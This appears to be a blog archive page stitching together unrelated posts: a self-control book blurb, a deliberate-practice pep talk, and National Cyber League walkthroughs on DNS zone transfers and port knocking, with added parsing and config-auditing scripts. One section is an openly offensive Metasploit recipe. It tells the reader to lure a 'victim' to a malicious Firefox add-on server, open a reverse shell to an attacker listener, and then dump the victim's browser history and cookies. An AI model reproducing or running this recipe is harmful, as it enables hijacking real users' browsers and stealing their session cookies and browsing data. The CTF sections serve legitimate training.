
The Marshmallow Test

Walter Mischel has written a book about the test, its findings, and learning greater self-control: The Marshmallow Test: Mastering Self-Control.

The world’s leading expert on self-control, Walter Mischel has proven that the ability to delay gratification is critical for a successful life, predicting higher SAT scores, better social and cognitive functioning, a healthier lifestyle and a greater sense of self-worth. But is willpower prewired, or can it be taught?

In The Marshmallow Test, Mischel explains how self-control can be mastered and applied to challenges in everyday life — from weight control to quitting smoking, overcoming heartbreak, making major decisions, and planning for retirement. With profound implications for the choices we make in parenting, education, public policy and self-care, The Marshmallow Test will change the way you think about who we are and what we can be.


DNS Enumeration for National Cyber League (NCL) Regular Season Game 2

A zone transfer in DNS is a normal occurrence, but when this information falls into the wrong hands the effect can be devastating. A zone transfer is designed to update DNS servers with the correct information; however, the zone contains information that could map out the network, providing valuable data about the structure of the environment.

The output below shows the dig command contacting the name server at 54.243.174.22 and asking for information about a domain called “flag.ncl”; the “-t AXFR” option requests a zone transfer. As you can see from the output, there is a good deal of information about potential target systems in the flag.ncl domain.

dig @54.243.174.22 flag.ncl -t AXFR
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> @54.243.174.22 flag.ncl -t AXFR
; (1 server found)
;; global options: +cmd
flag.ncl.		604800	IN	SOA	ncl. flag.ncl. 2 604800 86400 2419200 604800
flag.ncl.		604800	IN	NS	flag.ncl.
flag.ncl.		604800	IN	A	127.12.34.56
admin.flag.ncl.		604800	IN	A	127.44.65.92
secret.flag.ncl.	604800	IN	A	127.1.0.1
termserv.flag.ncl.	604800	IN	A	127.79.255.255
welcome.flag.ncl.	604800	IN	A	127.2.114.31
zeus.flag.ncl.		604800	IN	A	127.212.83.111
flag.ncl.		604800	IN	SOA	ncl. flag.ncl. 2 604800 86400 2419200 604800
;; Query time: 46 msec
;; SERVER: 54.243.174.22#53(54.243.174.22)
;; WHEN: Mon Nov  3 15:05:09 2014
;; XFR size: 9 records (messages 1, bytes 243)

 

Questions and Answers for (Enum 2) Enumeration and Exploitation:

What is the IP Address for the domain: “flag.ncl”?
127.12.34.56

What is the domain name with the IP Address of 127.44.65.92 (FQDN)?
admin.flag.ncl

What is the domain name with the IP Address of 127.212.83.111 (FQDN)?
zeus.flag.ncl

What is the domain name with the IP Address of 127.2.114.31 (FQDN)?
welcome.flag.ncl

What is the domain name with the IP Address of 127.79.255.255 (FQDN)?
termserv.flag.ncl

What is the domain name with the IP Address of 127.1.0.1 (FQDN)?
secret.flag.ncl
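
The lookups asked for above can be read off the transfer output mechanically. The following Python is an added example, not part of the original post: it parses the dig output shown earlier (embedded as a constructed string), checks that the answer starts and ends with the same SOA record as a complete AXFR does, and builds the name-to-address and address-to-name tables. The function names are illustrative.

```python
from collections import defaultdict

# Constructed sample: the zone-transfer output from this post, pasted as text.
DIG_OUTPUT = """\
; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> @54.243.174.22 flag.ncl -t AXFR
;; global options: +cmd
flag.ncl.          604800 IN SOA ncl. flag.ncl. 2 604800 86400 2419200 604800
flag.ncl.          604800 IN NS  flag.ncl.
flag.ncl.          604800 IN A   127.12.34.56
admin.flag.ncl.    604800 IN A   127.44.65.92
secret.flag.ncl.   604800 IN A   127.1.0.1
termserv.flag.ncl. 604800 IN A   127.79.255.255
welcome.flag.ncl.  604800 IN A   127.2.114.31
zeus.flag.ncl.     604800 IN A   127.212.83.111
flag.ncl.          604800 IN SOA ncl. flag.ncl. 2 604800 86400 2419200 604800
;; XFR size: 9 records (messages 1, bytes 243)
"""

def parse_records(text):
    """Return (name, ttl, rtype, rdata) tuples, skipping dig's ';' comment lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        name, ttl, _cls, rtype, rdata = line.split(None, 4)
        records.append((name.rstrip(".").lower(), int(ttl), rtype.upper(), rdata))
    return records

def transfer_complete(records):
    """A complete AXFR answer starts and ends with the same SOA record (RFC 5936)."""
    return (len(records) >= 2 and records[0][2] == "SOA"
            and records[0] == records[-1])

def address_maps(records):
    """Build name -> IPs and IP -> names tables from the A records."""
    forward, reverse = defaultdict(list), defaultdict(list)
    for name, _ttl, rtype, rdata in records:
        if rtype == "A":
            forward[name].append(rdata)
            reverse[rdata].append(name)
    return dict(forward), dict(reverse)

if __name__ == "__main__":
    recs = parse_records(DIG_OUTPUT)
    print("complete transfer:", transfer_complete(recs))
    _fwd, rev = address_maps(recs)
    for ip, names in sorted(rev.items()):
        print(f"{ip:16} {', '.join(names)}")
```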

 

Common DNS Record Types and Their Use:

A (address)
Maps a host name to an IP address

SOA (Start of Authority)
Identifies the DNS server responsible for the domain information

CNAME (canonical name)
Provides additional names or aliases for the address record

MX (mail exchange)
Identifies the mail server for the domain

SRV (service)
Identifies services such as directory services

PTR (pointer)
Maps IP addresses to host names

NS (name server)
Identifies other name servers for the domain

 


How to Get History and Cookies from Mozilla Firefox with Metasploit

Send the link of the server to the victim via chat, email or other social engineering technique. Once you have access to the victim's PC, simply run the post module to dump credentials.

msfconsole
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set uripath /
exploit

How to Collect History

use post/firefox/gather/history
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

How to Collect Cookies

use post/firefox/gather/cookies
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

Deliberate Practice

Are you working toward your ‘10 years of silence’ today? Are you deliberately focused on developing your skills? Or are you simply “putting in your time” and hoping for the best?

You can take the same approach to your work, to your goals, and to your legacy. By combining these two ideas — the consistency of “10 years of silence” and the focus of “deliberate practice” — you can blow past most people.


Port Knocking with Knockd and Knock for National Cyber League (NCL)

From Wikipedia: “In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s).”[1]

Install the Knockd Service and Client

sudo apt-get install knockd

A challenge may involve using the knock client and the default knockd sequence to open one or more new ports. It is recommended that you first scan the client with nmap -sV -p- -T5 [ipaddress]. This will show the current open port(s) and service/version information. Then try the knockd default sequence: knock -v [ipaddress] 7000 8000 9000.

There will be no immediate indication that a port has opened after knocking, as you will have to re-scan and compare to find the new open port. More than likely there is a time limit on how long the new port will stay open and available for access.

PROTIP: You may have to use “wget” to extract the flag. The command wget --no-check-certificate https://webaddress:port might extract the page hosted on the open port.

KnockdEfault Evaluator v1.1 – knock-knock

The two tools in this package are knockdefault.py and knockd_on-off.py. The first of these is a scanner to identify default configs and the latter is a utility to interact with identified vulnerable services.[2]

root@kali:~# git clone https://github.com/hack1thu7ch/knock-knock.git
root@kali:~# cd knock-knock/
root@kali:~# ./setup.sh
root@kali:~# ./knockdefault.py
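
The same default-configuration problem can be checked from the server side by auditing knockd.conf directly. The following Python is an added example, not part of the knock-knock package or the original post: it reads a knockd.conf (a constructed sample is embedded) and flags rules that use the default sequence, an evenly spaced sequence, or no stop_command. The function names and the two heuristics are assumptions made for illustration.

```python
import configparser

# 7000 8000 9000 is the default named above; its reverse is the stock close
# sequence (from general knowledge of knockd, not from this page).
DEFAULT_SEQUENCES = {(7000, 8000, 9000), (9000, 8000, 7000)}

# Constructed sample knockd.conf for the demonstration.
SAMPLE_CONF = """\
[options]
UseSyslog

[openSSH]
sequence = 7000,8000,9000
command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

[openHTTPS]
sequence = 4127:udp,50211:tcp,18733:tcp,9014:udp
start_command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 443 -j ACCEPT
cmd_timeout = 30
stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 443 -j ACCEPT
"""

def parse_sequence(value):
    """'7000,8000:tcp' -> (7000, 8000); the optional :tcp/:udp suffix is dropped."""
    return tuple(int(item.split(":")[0]) for item in value.split(",") if item.strip())

def audit_knockd(conf_text):
    """Return {section: [findings]} for knock rules that look guessable or sticky."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None, delimiters=("=",))
    cp.read_string(conf_text)
    report = {}
    for section in cp.sections():
        if not cp.has_option(section, "sequence"):
            continue  # [options] and other non-rule sections
        seq = parse_sequence(cp.get(section, "sequence"))
        findings = []
        if seq in DEFAULT_SEQUENCES:
            findings.append("default sequence")
        if len(seq) >= 3 and len({b - a for a, b in zip(seq, seq[1:])}) == 1:
            findings.append("evenly spaced ports")  # heuristic: predictable pattern
        if not cp.has_option(section, "stop_command"):
            findings.append("no stop_command")  # heuristic: rule is not reverted on a timer
        if findings:
            report[section] = findings
    return report

if __name__ == "__main__":
    for rule, findings in audit_knockd(SAMPLE_CONF).items():
        print(f"[{rule}] " + "; ".join(findings))
```

A dedicated close rule that uses only `command` will also be reported as lacking `stop_command`; treat that finding as a prompt to review the rule, not as a verdict.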

 

Web Citations:
[1] http://en.wikipedia.org/wiki/Port_knocking
[2] http://www.shortbus.ninja/default-knockd-cloaking-configurations/